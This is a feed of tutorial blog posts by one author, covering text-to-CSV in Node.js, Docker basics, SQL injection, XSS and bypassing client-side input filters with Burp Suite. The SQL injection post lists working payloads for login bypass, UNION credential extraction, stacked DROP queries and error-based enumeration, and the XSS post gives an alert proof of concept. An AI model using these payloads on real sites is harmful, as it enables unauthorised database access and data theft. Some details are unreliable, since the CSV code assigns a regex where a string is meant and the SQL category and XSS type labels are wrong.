DEV Community: Kunal Singh

Text to CSV using Javascript (JS)

Kunal Singh — Thu, 18 Aug 2022 10:31:00 +0000

What we will be looking at?

In this tutorial we are going to see how we can convert our data from text to csv and export it.

Steps:-

Install node (npm init -y)
Install packages (npm i fs)
Create ont .js extension file and open it in your favorite editor.

Code Explanation

const fs = require("fs"); Here we will be importing fs which we install. It will be used for exporting the file.

Here we have a dummy text data which we will be converting to CSV.
let s =This is my file
showing some data
data1 = 12
data2 = 156;

Here we have define a function that will take care of the conversation from text to csv.
const textToCSV = () => { // 1. Split the lines // 2. Split each words using spaces and join them using coma(,) // 3. Rejoin the lines let text = s .split("\n") .map((line) => line.split(/\s+/).join(",")) .join("\n"); // Save the data in csv format fs.writeFileSync("dataNew.csv", text); // Print Task completion console.log("Task Completed"); };

Text has been converted to csv.
textToCSV();

Whole code

`// Import module
const fs = require("fs");

// Text to be stored in csv file
let s = /This is my file showing some data data1 = 12 data2 = 156/;

// Function to create text to csv
const textToCSV = () => {
// 1. Split the lines
// 2. Split each words using spaces and join them using coma(,)
// 3. Rejoin the lines
let text = s
.split("\n")
.map((line) => line.split(/\s+/).join(","))
.join("\n");
// Save the data in csv format
fs.writeFileSync("dataNew.csv", text);
// Print Task completion
console.log("Task Completed");
};

textToCSV();`

Getting started with docker

Kunal Singh — Wed, 09 Feb 2022 04:20:59 +0000

INTRODUCTION

Docker is a container management service. The keywords of Docker are develop, ship and run anywhere. The whole idea of Docker is for developers to easily develop applications, ship them into containers which can then be deployed anywhere. The initial release of Docker was in March 2013 and since then, it has become the buzzword for modern world development, especially in the face of Agile-based projects.

*USES OF DOCKER
*
Docker streamlines the development lifecycle by allowing developers to work in standardized environments using local containers which provide your applications and services. Containers are great for continuous integration and continuous delivery (CI/CD) workflows.
Docker’s container-based platform allows for highly portable workloads. Docker containers can run on a developer’s local laptop, on physical or virtual machines in a data center, on cloud providers, or in a mixture of environments.
Docker’s portability and lightweight nature also make it easy to dynamically manage workloads, scaling up or tearing down applications and services as business needs dictate, in near real time.

*DOCKER ARCHITECTURE
*
Docker uses a client-server architecture. The Docker client talks to the Docker daemon, which does the heavy lifting of building, running, and distributing your Docker containers. The Docker client and daemon can run on the same system, or you can connect a Docker client to a remote Docker daemon. The Docker client and daemon communicate using a REST API, over UNIX sockets or a network interface. Another Docker client is Docker Compose, which lets you work with applications consisting of a set of containers.

*DOCKER DAEMON
*
The Docker daemon (dockerd) listens for Docker API requests and manages Docker objects such as images, containers, networks, and volumes. A daemon can also communicate with other daemons to manage Docker services.

*DOCKER CLIENT
*
The Docker client (docker) is the primary way that many Docker users interact with Docker. When you use commands such as docker run, the client sends these commands to dockerd, which carries them out. The docker command uses the Docker API. The Docker client can communicate with more than one daemon.

*DOCKER DESKTOP
*
Docker Desktop is an easy-to-install application for your Mac or Windows environment that enables you to build and share containerized applications and microservices. Docker Desktop includes the Docker daemon (dockerd), the Docker client (docker), Docker Compose, Docker Content Trust, Kubernetes, and Credential Helper. For more information, see Docker Desktop.

*DOCKER REGISTRIES
*
A Docker registry stores Docker images. Docker Hub is a public registry that anyone can use, and Docker is configured to look for images on Docker Hub by default. You can even run your own private registry. When you use the docker pull or docker run commands, the required images are pulled from your configured registry. When you use the docker push command, your image is pushed to your configured registry.

*DOCKER OBJECTS
*
When you use Docker, you are creating and using images, containers, networks, volumes, plugins, and other objects. This section is a brief overview of some of those objects.

*DOCKER IMAGES
*
An image is a read-only template with instructions for creating a Docker container. Often, an image is based on another image, with some additional customization. For example, you may build an image which is based on the ubuntu image, but installs the Apache web server and your application, as well as the configuration details needed to make your application run. You might create your own images or you might only use those created by others and published in a registry. To build your own image, you create a Docker file with a simple syntax for defining the steps needed to create the image and run it. Each instruction in a Docker file creates a layer in the image. When you change the Docker file and rebuild the image, only those layers which have changed are rebuilt. This is part of what makes images so lightweight, small, and fast, when compared to other virtualization technologies.

*DOCKER CONTAINERS
*
A container is a runnable instance of an image. You can create, start, stop, move, or delete a container using the Docker API or CLI. You can connect a container to one or more networks, attach storage to it, or even create a new image based on its current state. By default, a container is relatively well isolated from other containers and its host machine. You can control how isolated a container’s network, storage, or other underlying subsystems are from other containers or from the host machine. A container is defined by its image as well as any configuration options you provide to it when you create or start it. When a container is removed, any changes to its state that are not stored in persistent storage disappear.

*ENOUGH THEORY LET’S START THE PRACTICAL
*
*Install docker in your local system
*
Install docker in your system. You can refer to the video or documentation here. Once the installation is complete you can proceed to Step 2.

Open the visual studio code (VS Code) and create a directory and create a file inside it with javascript extension (test.js) and create a Dockerfile. Install relevant packages related to docker
–Docker
|- test.js
|- Dockerfile

test.js

Once the above step is done lets create an image. But before creating an image let us understand what will be there in the image.

So, if we have to run a JavaScript file we can use node for that like node test.js, So we need a Kernel or an OS and then we need a runtime environment in this case it is Node. Then we need a file which we have to execute and in the end we have to run that file to get the output.

In the Docker file created in our directory in step 2 we will write steps to be followed to run that file independently.
We will start to write with a base image. A base image has a bunch of files where we go and take files and add additional files to it.

FROM node:alpine -> There are different node images which are built on top of different distributions of linux. ( : ) colon is used to mention which Linux distribution we would like to use. Alpine is nothing but a linux distribution. If we want we can take some other distribution as well.

COPY source destination -> The COPY instruction copies new files or directories from and adds them to the filesystem of the container at the path .
WORKDIR /path/to/workdir -> The WORKDIR instruction sets the working directory for any RUN, CMD, ENTRYPOINT, COPY and ADD instructions that follow it in the Docker file. If the WORKDIR doesn’t exist, it will be created even if it’s not used in any subsequent Docker file instruction.

The CMD instruction has three forms:
CMD "executable","param1","param2"
CMD "param1","param2"
CMD command param1 param2 (shell form)
There can only be one CMD instruction in a Docker file. If you list more than one CMD then only the last CMD will take effect.
The main purpose of a CMD is to provide defaults for an executing container. These defaults can include an executable, or they can omit the executable, in which case you must specify an ENTRYPOINT instruction as well.

*The code in out file will be:
*
FROM node:alpine
COPY . /app
WORKDIR /app
CMD node test.js

*IMPORTANT COMMANDS TO MAKE DOCKER RUN
*
DESCRIPTION -> To build a docker image
COMMAND -> docker build -t name-of-file destination

DESCRIPTION -> Running an image
COMMAND -> docker run ubuntu

DESCRIPTION -> To see list of running containers
COMMAND -> docker ps OR docker container ls

DESCRIPTION -> To see list of running and stopped containers
COMMAND -> docker ps -a OR docker container ls -a

DESCRIPTION -> To run docker in an interactive mode
COMMAND -> Docker run -it ubuntu

*REFERENCES
*
DOCKER BUILDER GUIDE (https://docs.docker.com/engine/reference/builder/)
An introduction to Docker for reproducible research
(https://dl.acm.org/doi/10.1145/2723872.2723882)
The Docker Book: Containerization is the new virtualization
Learning Docker
Docker: Up & Running: Shipping Reliable Containers in Production

A Detailed Report on SQL INJECTION

Kunal Singh — Mon, 11 Oct 2021 02:46:57 +0000

What is SQL?

SQL is a language that is used to access and manipulate databases or relational databases.
SQL is also known as Structured Query Language.
SQL became a standard of the American National Standards Institute (ANSI) in 1986, and the International Organization for Standardization (ISO) in 1987.
Some common relational database management systems that use SQL are Oracle, Sybase, Microsoft SQL Server, Microsoft Access, Ingres, etc.
SQL is majorly used in websites that we create where SQL works in the backend to store the data of the customer.
SQL comes in many versions and most of them are free to use and we don’t need very high coding skills to use SQL.
SQL has some drawbacks too like some versions of SQL are expensive and due to hidden business rules completed access is not given to the database.
We can use SQL to perform certain operations on the existing database and also we can use this language to create a database. SQL uses certain commands like Create, Drop, Insert, etc. to carry out the required tasks.
These SQL commands are mainly categorized into four categories as:
DDL – Data Definition Language
DQL – Data Query Language
DML – Data Manipulation Language
TCL – Data Control Language
Data Definition Language (DDL) is the commands that are used to define the schema.
Data Query Language (DQL) are the commands that are used to perform queries on the data within schema objects.
Data Manipulation Language (DML) is the commands that are used for the manipulation of data present in the database.
Transaction Control Language (TCL) are the commands that are used for giving and taking rights, permissions, and other controls of the database system.
SQL join:

What is SQL Injection (SQLi)?
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve.
A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system.
Generally, SQLi happens in WEB APIs where the data is being sent to the databases either by GET method or by POST method.
Suppose if we are sending data to the database by GET method it is easy to add some malicious data in URL where is if the data is being sent by POST method we can not see what is being sent and so we need something to intercept the POST based request and give us the request that is being sent to the server/database.
To intercept POST-based requests we use Burpsuit.
The risk factor of SQLi is high/critical as it can reveal some sensitive data of the user to the attacker and may compromise in any kind of backdoor a
SQL/ SQL Injection Cheat Sheet
SELECT c1, c2 FROM t; Query data in columns c1, c2 from a table
SELECT * FROM t; Query all rows and columns from a table
SELECT c1, c2 FROM t WHERE condition; Query data and filter rows with a condition
SELECT DISTINCT c1 FROM t WHERE condition; Query distinct rows from a table
SELECT c1, aggregate(c2) FROM t GROUP BY c1; Group rows using an aggregate function
SELECT c1, aggregate(c2) FROM t GROUP BY c1 HAVING condition; Filter groups using HAVING clause
SELECT c1, c2 FROM t ORDER BY c1 ASC [DESC]; Sort the result set in ascending or descending
Order SELECT c1, c2 FROM t1 UNION [ALL] SELECT c1, c2 FROM t2; Combine rows from two queries
SELECT c1, c2 FROM t1 INTERSECT SELECT c1, c2 FROM t2; Return the intersection of two queries
SELECT c1, c2 FROM t1 MINUS SELECT c1, c2 FROM t2; Subtract a result set from another result set
SELECT c1, c2 FROM t1 WHERE c1 [NOT] LIKE pattern; Query rows using pattern matching %, _
SELECT c1, c2 FROM t WHERE c1 [NOT] IN value_list; Query rows in a list
SELECT c1, c2 FROM t WHERE c1 BETWEEN low AND high; Query rows between two values
SELECT c1, c2 FROM t WHERE c1 IS [NOT] NULL; Check if values in a table is NULL or not
QUERYING DATA FROM A TABLE QUERYING FROM MULTIPLE TABLES USING SQL OPERATORS SELECT c1, c2 FROM t ORDER BY c1 LIMIT n OFFSET offset; Skip offset of rows and return the next n rows
SELECT c1, c2 FROM t1 INNER JOIN t2 ON condition; Inner join t1 and t2
SELECT c1, c2 FROM t1 LEFT JOIN t2 ON condition; Left join t1 and t1
SELECT c1, c2 FROM t1 FULL OUTER JOIN t2 ON condition; Perform full outer join
SELECT c1, c2 FROM t1 CROSS JOIN t2; Produce a Cartesian product of rows in tables
SELECT c1, c2 FROM t1 A INNER JOIN t2 B ON condition; Join t1 to itself using INNER JOIN clause
INSERT INTO t(column_list) VALUES(value_list); Insert one row into a table
INSERT INTO t(column_list) VALUES (value_list), (value_list), ….;
Insert multiple rows into a table

INSERT INTO t1(column_list) SELECT column_list FROM t2; Insert rows from t2 into t1
UPDATE t SET c1 = new_value, c2 = new_value WHERE condition; Update values in the column c1, c2 that match the condition
DELETE FROM t; Delete all data in a table
DELETE FROM t WHERE condition; Delete subset of rows in a table
UPDATE t SET c1 = new_value; Update new value in the column c1 for all rows
Ending / Commenting Out / Line Comments
Username: admin'--
This is going to log you as the admin, user because the rest of the SQL query will be ignored.
SELECT*FROM members WHERE username = 'admin'--' AND password = 'password'
Comments out the rest of the query by not closing them or you can use it for bypassing blacklisting, removing spaces, obfuscating and determining database versions. It is known as Inline comment.
SELECT/avoid-spaces/password//FROM//Members
Executing more than one query in one transaction. This is very useful in every injection point, especially in SQL Server back ended applications.
;SELECT * FROM members; DROP members-- Ends a query and starts a new one.
MySQL If Statement
IF(condition,true-part,false-part)
SELECT IF(1=1,'true','false')
If MySQL is running in ANSI mode it's going to work but otherwise, MySQL accepts it as a logical operator it'll return 0. A better way to do it is using the CONCAT()function in MySQL.
CONCAT(str1, str2, str3, ...) Concatenate supplied strings.
SELECT CONCAT(login, password) FROM members
UNION INJECTION:- This will combine results from both the news table and members table and return all of them.
SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
Another Example for UNION Injection
'UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
Login ByPass
admin’ #
admin” #
admin’)) #
‘ or 1=1 --+
‘ or 1=1 #
" or " " "
" or true --
" or true --+
‘)) or true -- -
admin' or 1=1 or ''='
admin') or ('1'='1'--
admin') or '1'='1'/*
admin") or "1"="1
') or ('1'='1 --
One or more queries can be executed and their results can be appended to the original query in MySQL using the UNION keyword.
order by 1,sleep(10) --+
‘ union select @@version ,sleep(10),3 --+
‘ union select @@version ,sleep(10),3,"'3'"# --+
Using the UNION keyword, the number of tables in the database can be determined by incrementing the specified table index number until an error occurs.
' order by 3 --+
' order by 4 --+
' order by 5 --+ (if it gives an error means that there are 4 tables)
Getting what columns are displaying the results of a query clearly:
' union select 1,2,3 --+
Getting the database version number:
’ union select 1,database(),3 --+
Error Based:
Count, floor and group functions can be used in order to produce the error. These functions are helpful if MySQL isn’t displaying output via UNION based queries.
(select count(), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)
Enumerating database
‘ AND (select 1 from (select count(), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()2))a from information_schema.columns group by a)b) --+
Enumerating current user
‘ AND (select 1 from (select count(), concat(0x3a,0x3a,(select current_user,0x3a,0x3a, floor(rand()2))a from information_schema.columns group by a)b) --+
Enumerating table names,
‘ AND (select 1 from (select count(), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 2,1),0x3a,0x3a, floor(rand()2))a from information_schema.columns group by a)b) --+
Enumerating column names
‘ AND (select 1 from (select count(), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+
References
https://www.geeksforgeeks.org/sql-ddl-dml-tcl-dcl/
https://www.geeksforgeeks.org/sql-ddl-dql-dml-dcl-tcl-commands/
https://www.w3schools.com/sql/sql_injection.asp
https://portswigger.net/web-security/sql-injection
https://owasp.org/www-community/attacks/SQL_Injection
https://portswigger.net/web-security/sql-injection/cheat-sheet
https://www.sqltutorial.org/wp-content/uploads/2016/04/SQL-cheat-sheet.pdf
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
https://www.hackingloops.com/sql-injection-cheat-sheet/

Cross-Site Scripting or XSS

Kunal Singh — Mon, 11 Oct 2021 02:43:00 +0000

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Let us understand it with an example:

Suppose we visited a website named abc.com who sell some good cloths but prices were high and we close the website later we received a mail where we actually got an off of 90% and there was a link

www.abc.com/shirts/fullsleves/productid=1asd212Sda/!@a1

so we ordered some clothes from that link and completed our transaction online. Suddenly we got an update and we came to know that some more transactions happened from our account which were not done by us. This means that our data has been leaked and as we did shopping online and after that only our data was lost so it means there is a high chance that our data has been lost from the website or we can say our data has been leaked from the website. We will understand in depth what might have gone wrong here which causes a data loss whereas the flaws that allow these attacks to succeed are quite more than we can think and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
There are three types of XSS present:
Temporary XSS (AKA non-persistent or Type II)
Permanent XSS (AKA persistent or Type I)
DOM based XSS (AKA Type 0)

Temporary XSS:

What is temporary xss

In layman language temporary xss are the vulnerabilities which allow hackers to insert malicious codes into the HTML code of the browser.

Temporary xss happens when a user clicks on a user made link as it is not stored on the website. In the above example we can see that the link looks fine
www.abc.com/shirts/fullsleves/productid=1asd212Sda/!@a1

but if you observe clearly then /!@ extension to the original link is what represents that something has been added to the original link. Let us take some other example and see how good we are suppose I visit a website named abcklm.com there I purchased something and after the payment is completed I again got an popup saying Your order is placed successfully and a OK button as it seems fine we press OK button but when we wait for the product we didn’t receive and then we went to website to check what has happened and there we saw that order has been cancelled by us but we never did it. Remember that POP up is the place where this magic happens.

In this scenario malicious code is stored anywhere in the application and only the user who clicks on a hacker made link is affected.

How can we find them?

Temporary XSS are hard to find as they can be present anywhere some common places where you can find them are:

Accept Cookies when we login to a website.
Pop Ups whenever we login to a user or signout from a user or make payment.

In emails

When a website uses customer details to show customs results are likely to be found vulnerable to temporary XSS. So whenever we pass something to a webpage wand we want to check whether it is vulnerable or not we can do that by looking and some code.

JavaScript usage in Temporary XSS.

JavaScript helps us to use keyloggers which can steal user cookies or some token which can later be used by hackers to fetch important data about the user. If we are getting blocked we can use an event listener or check the source code. When we are working with a website and we use JavaScript we can prepare POC(Proof Of Concept) for example:

http://www.xyz.com/post.php?user_id=ks1912 Chek new messages alert( “POC”)

And in the output we got an alert box saying “POC” with a “OK” button then that box is Proof of Concept for us.

Permanent XSS:

What is Permanent XSS?

To understand permanent XSS lets see an example from real life. In 2005 like Facebook there was a social media company known as Myspace. It was brought down by a hacker named samy’s. He did this by exploiting XSS vulnerability. He was able to reflect the special character of the source code of the application by entering them in a status. Samay also found that if he passes custom html status to his web application he can pass the same html status to anyone who views his status which can be furture executed by the browser. Samay then passes a malicious code which adds anyone to his friend list to whoever sees the status.

Permanent XSS are the vulnerabilities in which a hacker injects and executes malicious client side scripts through the browser which gets permanently stored in the database.

In this scenario malicious code is stored in the database and all the users of the website are affected.

Exploiting Permanent XSS.
As a defensive measure many websites use a protected filter to stop all these vulnerabilities but are they really secure? Let's find out.
To bypass these filters we can either see the source code and find out which part of the website is getting blocked by the server or we can use an event listener. We can also check whether data is being sent as a POST or GET method. If it is in the POST method then we can play with the URL like injecting comments with a custom url which can be used to steal our data or using burp suite.
DOM based XSS.
What is DOM based XSS?

DOM based XSS arises when an application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.In this scenario the source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser. For example, the source (where malicious data is read) could be the URL of the page (e.g., document.location.href), or it could be an element of the HTML, and the sink is a sensitive method call that causes the execution of the malicious data (e.g., document.write).”

How can we protect ourselves from Cross Site Scripting or XSS?

HTML Encode Before Inserting Untrusted Data into HTML Element Content
Attribute Encode Before Inserting Untrusted Data into HTML Common Attributes
JavaScript Encode Before Inserting Untrusted Data into JavaScript Data Values
CSS Encode And Strictly Validate Before Inserting Untrusted Data into HTML Style Property Values
URL Encode Before Inserting Untrusted Data into HTML URL Parameter Values

References:
https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
https://portswigger.net/web-security/cross-site-scriptin
https://owasp.org/www-community/attacks/xss/

How to bypass input filter

Kunal Singh — Sat, 09 Oct 2021 18:22:40 +0000

Before going into client-side filters let’s understand what client-side filters are. As we know nowadays there are a lot of safer websites available in the market and to make themselves safer they use different kinds of filters also which can be categories in two parts :

Client-Side Filters
Server-Side Filters

We can also say that when we give input and if it satisfies the criteria then it will be accepted otherwise it will raise an error.

For example: Entering letters in the phone number field or Inserting email without @ symbol
Now let's jump in the client-side filter and understand what is meant by that.

Client-Side Filter

On the client-side, the input is being checked on the by browser only which means before sending the input to the server Where on the server-side the input is being sent to the server, and then the server checks whether is valid or not. It is hard to bypass server-side filters as compared to client-side filters but in the end, both of the filters can be bypassed depending on the code and how they are written in the backend and what filters they have used, and whether they do their job completely or not.

We are going to use the burp suite to intercept the HTTP header response for our current example.

Steps to bypass client-side filters using burp suite.

Open the page where you want to check the client-side filter. I am taking the example of a signup page.

Now I will enter the correct details and click on the signup and intercept that request using a burp suite and note down the response that has been sent to the server by the browser when we enter the correct credentials.

Now in the burp suite, I can try to change or temper the data like dis selecting the selected field (terns and condition) changing the required fields (if age is 18 years or above changing it to less than 18)

After doing necessary changes if we forwarded the request from

Burp Suite and it is accepted and we are able to signup successfully that means there is no server-side filter or check.

This type of Vulnerability is also known as Improper or Missing Server Side Validation Vulnerability

To make our web application safer from Client-side attacks we can avoid this kind of vulnerabilities.